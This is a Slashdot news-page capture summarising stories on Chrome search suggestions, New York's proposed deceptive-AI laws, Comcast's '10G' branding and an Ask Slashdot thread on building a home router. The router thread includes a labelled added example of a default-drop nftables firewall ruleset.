Google is Making Search Suggestions in Chrome More Helpful (techcrunch.com) 25

An anonymous reader shares a report: Google is introducing improvements to search suggestions in Chrome, the company announced today. As part of the changes, users will start to get more helpful search suggestions in Chrome based on what others are searching for, see more images for suggested searches and find search suggestions even with a poor connection.

Search suggestions are the drop-down list of suggested completions that appear before you finish typing out your query in Google. The feature generates predictions to help users save time and speed up their search. With these new updates, Google is expanding the availability of search suggestions and using them to boost inspiration. When users are signed into Chrome on desktop and open a new tab, they will now start to see suggestions in the search box related to their previous searches based on what other people are searching for.

AI

NY Governor Wants To Criminalize Deceptive AI (axios.com) 39

New York Gov. Kathy Hochul is proposing legislation that would criminalize some deceptive and abusive uses of AI and require disclosure of AI in election campaign materials, her office told Axios. From the report: Hochul's proposed laws include establishing the crime of "unlawful dissemination or publication of a fabricated photographic, videographic, or audio record." Making unauthorized uses of a person's voice "in connection with advertising or trade" a misdemeanor offense. Such offenses are punishable by up to a one-year jail sentence. Expanding New York's penal law to include unauthorized uses of artificial intelligence in coercion, criminal impersonation and identity theft.

Amending existing intimate images and revenge porn statutes to include "digital images" -- ranging from realistic Photoshop-produced work to advanced AI-generated content. Codifying the right to sue over digitally manipulated false images. Requiring disclosures of AI use in all forms of political communication "including video recording, motion picture, film, audio recording, electronic image, photograph, text, or any technological representation of speech or conduct" within 60 days of an election.

The Internet

Ask Slashdot: Can You Roll Your Own Home Router? 150

"My goal is to have a firewall that I trust," writes Slashdot reader eggegick, "not a firewall that comes from the manufacturer that might have back doors." I'm looking for a cheap mini PC I can turn into a headless Linux-based wireless and Ethernet router. The setup would be a cable modem on the Comcast side, Ethernet out from the modem to the router, and Ethernet and WiFi out to the home network.
Two long-time Slashdot readers had suggestions. johnnys believes "any old desktop or even a laptop will work.... as long as you have a way to get a couple of (fast or Gigabit) Ethernet ports and a good WiFi adapter... " Cable or any consumer-grade broadband doesn't need exotic levels of throughput: Gigabit Ethernet will not be saturated by any such connection...

You can also look at putting FOSS firewall software like DD-WRT or OpenWrt on consumer-grade "routers". Such hardware is usually set up with the right hardware and capabilities you are looking for. Note however that newer hardware may not work with such firmwares as the FCC rules about controlling RF have caused many manufacturers to lock down firmware images.

And you don't necessarily need to roll your own with iptables: There are several BSD or Linux-based FOSS distributions that do good firewall functionality. PFSense is very good and user-friendly, and there are others. OpenBSD provides an exceptionally capable enterprise-level firewall on a secure platform, but it's not designed to be user-friendly.
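If you do roll your own on a Linux box rather than using pfSense or OpenWrt, the firewall half of the job is a short ruleset. Below is an added example, not from either comment or from any of the projects named: a shell function that emits a minimal nftables policy for a router with one WAN and one LAN interface (default-drop inbound from the WAN, stateful forwarding from LAN to WAN, NAT on the WAN side). The interface names, the choice of nftables over the iptables mentioned above, and the decision to trust everything arriving on the LAN are assumptions.

```shell
#!/bin/sh
# Emit a minimal nftables ruleset for a two-interface home router.
# Added example; interface names are passed in and the policy is an assumption.
# Usage: gen_router_ruleset <wan_iface> <lan_iface> > /etc/nftables.conf
gen_router_ruleset() {
  wan="$1"
  lan="$2"
  cat <<EOF
flush ruleset

table inet filter {
  chain input {
    type filter hook input priority 0; policy drop;
    # Replies to traffic the router itself started, and loopback.
    ct state established,related accept
    ct state invalid drop
    iif lo accept
    # Assumption: the LAN side is trusted (DHCP, DNS and admin SSH to the router).
    iifname "$lan" accept comment "trust the LAN"
    # From the WAN, allow only rate-limited ping and the ICMPv6 needed for IPv6 to work.
    iifname "$wan" icmp type echo-request limit rate 5/second accept
    iifname "$wan" icmpv6 type { nd-neighbor-solicit, nd-neighbor-advert, nd-router-advert, echo-request } accept
  }

  chain forward {
    type filter hook forward priority 0; policy drop;
    # Only LAN-initiated flows and their replies cross the router.
    ct state established,related accept
    ct state invalid drop
    iifname "$lan" oifname "$wan" accept
  }
}

table ip nat {
  chain postrouting {
    type nat hook postrouting priority 100; policy accept;
    # Hide the LAN behind the router's WAN address.
    oifname "$wan" masquerade
  }
}
EOF
}
```

Write the output to a file and check it with `nft -c -f /etc/nftables.conf` before loading it; `sysctl net.ipv4.ip_forward=1` is still needed for the forward chain to see any traffic. A WiFi interface run by hostapd is simplest to treat as part of the LAN by bridging it with the wired LAN port, so that one name covers both.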

Long-time Slashdot reader Spazmania agrees the "best bet" is "one of those generic home wifi routers that are supported by DD-WRT or OpenWrt." It's not uncommon to find something used for $10-$20. And then install one or the other, giving a Linux box with full control. Add a USB stick so you have enough space for all the utilities.

I just went through the search for mini-PCs for a project at work. The main problem is that almost all of them cool poorly, and that significantly impairs their life span. I finally found a few at the $100 price point that cooled acceptably... and they disappeared from the market shortly after I bought the test units, replaced with newer models in the $250 ballpark.

Share your own thoughts and experiences in the comments.

The Internet

Comcast Reluctantly Agrees To Stop Its Misleading '10G Network' Claims (arstechnica.com) 67

An anonymous reader quotes a report from Ars Technica: Comcast has reluctantly agreed to discontinue its "Xfinity 10G Network" brand name after losing an appeal of a ruling that found the marketing term was misleading. It will keep using the term 10G in other ways, however. Verizon and T-Mobile both challenged Comcast's advertising of 10G, a term used by cable companies since it was unveiled in January 2019 by industry lobby group NCTA-The Internet & Television Association. We wrote in 2019 that the cable industry's 10G marketing was likely to confuse consumers and seemed to be a way of countering 5G hype generated by wireless companies.

10G doesn't refer to the 10th generation of a technology. It is a reference to potential 10Gbps broadband connections, which would be much faster than the actual speeds on standard cable networks today. The challenges lodged against Comcast marketing were filed with the advertising industry's self-regulatory system run by BBB National Programs. BBB's National Advertising Division (NAD) ruled against Comcast in October 2023, but Comcast appealed to the National Advertising Review Board (NARB). The NARB announced its ruling today, agreeing with the NAD that "Comcast should discontinue use of the term 10G, both when used in the name of the service itself ('Xfinity 10G Network') as well as when used to describe the Xfinity network. The use of 10G in a manner that is not false or misleading and is consistent with the panel decision is not precluded by the panel recommendations."

Comcast agreed to make the change in an advertiser's statement that it provided to the NARB. "Although Comcast strongly disagrees with NARB's analysis and approach, Comcast will discontinue use of the brand name 'Xfinity 10G Network' and will not use the term '10G' in a manner that misleadingly describes the Xfinity network itself," Comcast said. Comcast said it disagrees with "the recommendation to discontinue the brand name" because the company "makes available 10Gbps of Internet speed to 98 percent of its subscribers upon request." But those 10Gbps speeds aren't available in Comcast's typical service plans and require a fiber-to-the-home connection instead of a standard cable installation. Comcast said it may still use 10G in ways that are less likely to confuse consumers. "Consistent with the panel's recommendation... Comcast reserves the right to use the term '10G' or 'Xfinity 10G' in a manner that does not misleadingly describe the Xfinity network itself," the company said.
